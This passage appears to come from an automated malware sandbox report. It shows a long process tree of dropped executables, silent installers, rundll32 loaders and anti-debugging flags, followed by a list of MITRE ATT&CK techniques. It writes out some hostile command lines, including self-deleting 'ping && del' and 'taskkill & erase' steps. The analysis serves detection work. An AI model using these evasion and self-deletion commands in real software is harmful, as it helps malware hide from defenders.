                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                          PID:8408
                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\WerFault.exe -u -p 2672 -s 392
                                                                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                          PID:8896
                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hwwnyugr.ixy\installer.exe /qn CAMPAIGN=654 & exit
                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                        PID:2904
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\hwwnyugr.ixy\installer.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\hwwnyugr.ixy\installer.exe /qn CAMPAIGN=654
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                          PID:1988
                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Windows Media Player\IKFKYHIGTY\poweroff.exe
                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Windows Media Player\IKFKYHIGTY\poweroff.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                      PID:2044
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-62HJ9.tmp\poweroff.tmp
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-62HJ9.tmp\poweroff.tmp" /SL5="$70280,490199,350720,C:\Program Files\Windows Media Player\IKFKYHIGTY\poweroff.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                        PID:3028
                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\powerOff\Power Off.exe
                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:1696
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c 61f444484c95c_Fri1935f4d7.exe
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              PID:2084
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444484c95c_Fri1935f4d7.exe
                                                                                                                                                                                                                                                                                                                61f444484c95c_Fri1935f4d7.exe
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                PID:1096
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4a66e1d5-ae00-4dae-89e0-20945d569055.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\4a66e1d5-ae00-4dae-89e0-20945d569055.exe"
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                  PID:2532
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2976f4d7-b4e1-4ad5-822b-adc5fee285d3.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\2976f4d7-b4e1-4ad5-822b-adc5fee285d3.exe"
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                  PID:2812
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c 61f4444c111e2_Fri19a81fac93.exe
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:2152
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c 61f4444bb4db4_Fri1983c396.exe
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:2128
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444bb4db4_Fri1983c396.exe
                                                                                                                                                                                                                                                                                                                    61f4444bb4db4_Fri1983c396.exe
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                    PID:1732
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\control.exe" .\d4NH.7mK
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                        PID:1844
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\d4NH.7mK
                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                            PID:2832
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c 61f4444a5740f_Fri1910e1884641.exe
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                      PID:2132
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444a5740f_Fri1910e1884641.exe
                                                                                                                                                                                                                                                                                                                        61f4444a5740f_Fri1910e1884641.exe
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:1504
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444a5740f_Fri1910e1884641.exe" >> NUL
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:1408
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                                                                              PID:972
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c 61f4444748c2d_Fri194dee51bce0.exe
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:2064
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444748c2d_Fri194dee51bce0.exe
                                                                                                                                                                                                                                                                                                                          61f4444748c2d_Fri194dee51bce0.exe
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:2160
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444748c2d_Fri194dee51bce0.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4444748c2d_Fri194dee51bce0.exe" -a
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            PID:2744
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c 61f444468dabd_Fri1908e08adec0.exe
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                        PID:2060
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444468dabd_Fri1908e08adec0.exe
                                                                                                                                                                                                                                                                                                                          61f444468dabd_Fri1908e08adec0.exe
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:1460
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                            PID:1480
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                              PID:8116
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 1460 -s 392
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                                              PID:1652
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c 61f44444085d0_Fri19e91e167.exe /mixtwo
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                          PID:2008
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f44444085d0_Fri19e91e167.exe
                                                                                                                                                                                                                                                                                                                            61f44444085d0_Fri19e91e167.exe /mixtwo
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:2244
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "61f44444085d0_Fri19e91e167.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f44444085d0_Fri19e91e167.exe" & exit
                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                PID:2644
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  taskkill /im "61f44444085d0_Fri19e91e167.exe" /f
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                  PID:2168
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c 61f444422f88f_Fri190c04e68e.exe
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:3068
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444422f88f_Fri190c04e68e.exe
                                                                                                                                                                                                                                                                                                                              61f444422f88f_Fri190c04e68e.exe
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              PID:2668
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-JF1UU.tmp\61f444422f88f_Fri190c04e68e.tmp
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-JF1UU.tmp\61f444422f88f_Fri190c04e68e.tmp" /SL5="$4022A,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444422f88f_Fri190c04e68e.exe"
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:2800
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444422f88f_Fri190c04e68e.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444422f88f_Fri190c04e68e.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:2912
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-N5UFH.tmp\61f444422f88f_Fri190c04e68e.tmp
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-N5UFH.tmp\61f444422f88f_Fri190c04e68e.tmp" /SL5="$70274,870458,780800,C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f444422f88f_Fri190c04e68e.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                    PID:884
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-RRQJL.tmp\dllhostwin.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-RRQJL.tmp\dllhostwin.exe" 77
                                                                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                      PID:2652
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c 61f44440180f9_Fri19bfafe14.exe
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:3060
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f44440180f9_Fri19bfafe14.exe
                                                                                                                                                                                                                                                                                                                              61f44440180f9_Fri19bfafe14.exe
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                              PID:2228
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f44440180f9_Fri19bfafe14.exe
                                                                                                                                                                                                                                                                                                                                61f44440180f9_Fri19bfafe14.exe
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                PID:2840
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c 61f4443e6ee1f_Fri191c2a3126a8.exe
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                            PID:3048
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC4BA7419\61f4443e6ee1f_Fri191c2a3126a8.exe
                                                                                                                                                                                                                                                                                                                              61f4443e6ee1f_Fri191c2a3126a8.exe
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                              PID:2524
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                      PID:2100
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                        PID:2116
                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9222.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9222.exe
                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:2224
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,z C:\Users\Admin\AppData\Local\Temp\9222.exe
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:2636
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\AppData\Local\Temp\9222.exe.dll,czFBN0hYUUg=
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:2544
                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 7295
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:788
                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                                                                              PID:2988
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2988 -s 544
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                PID:2280
                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\pcwrun.exe
                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\pcwrun.exe "C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:2328
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\msdt.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWADAD.xml /skip TRUE
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                    PID:952
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\sdiagnhost.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\sdiagnhost.exe -Embedding
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:2560
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                        PID:3000
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:2088
                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\powerOff\unins000.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\powerOff\unins000.exe"
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:2980
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp" /SECONDPHASE="C:\Program Files (x86)\powerOff\unins000.exe" /FIRSTPHASEWND=$15034C
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1696
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                PID:2500
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7808
                                                                                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Footer Quotes\uninstall.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Footer Quotes\uninstall.exe"
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:2116
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\~nsuA.tmp\Un_A.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\~nsuA.tmp\Un_A.exe" _?=C:\Program Files (x86)\Footer Quotes\
                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8112
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                            rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main --uninstall
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:8132
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                rundll32 "C:\Program Files (x86)\Footer Quotes\chrome_manager_x64.dll" main --uninstall
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8104
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\DllHost.exe /Processid:{FCC74B77-EC3E-4DD8-A80B-008A702075A9}
                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                            PID:616
                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\AtomTweaker\unins000.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\AtomTweaker\unins000.exe"
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                PID:2468
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\_iu14D2N.tmp" /SECONDPHASE="C:\Program Files (x86)\AtomTweaker\unins000.exe" /FIRSTPHASEWND=$4035C
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:2176

                                                                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                                                              Persistence

                                                                                                                                                                                                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1060

                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                              Defense Evasion

                                                                                                                                                                                                                                                                                                                                                              Modify Registry

                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                              T1112

                                                                                                                                                                                                                                                                                                                                                              BITS Jobs

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1197

                                                                                                                                                                                                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1130

                                                                                                                                                                                                                                                                                                                                                              Credential Access

                                                                                                                                                                                                                                                                                                                                                              Credentials in Files

                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                              T1081

                                                                                                                                                                                                                                                                                                                                                              Discovery

                                                                                                                                                                                                                                                                                                                                                              Software Discovery

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1518

                                                                                                                                                                                                                                                                                                                                                              Security Software Discovery

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1063

                                                                                                                                                                                                                                                                                                                                                              Query Registry

                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                              T1012

                                                                                                                                                                                                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                                                              2
                                                                                                                                                                                                                                                                                                                                                              T1120

                                                                                                                                                                                                                                                                                                                                                              System Information Discovery

                                                                                                                                                                                                                                                                                                                                                              4
                                                                                                                                                                                                                                                                                                                                                              T1082

                                                                                                                                                                                                                                                                                                                                                              Process Discovery

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1057

                                                                                                                                                                                                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                                                                                                                                                                                                              1
                                                                                                                                                                                                                                                                                                                                                              T1018

                                                                                                                                                                                                                                                                                                                                                              Collection

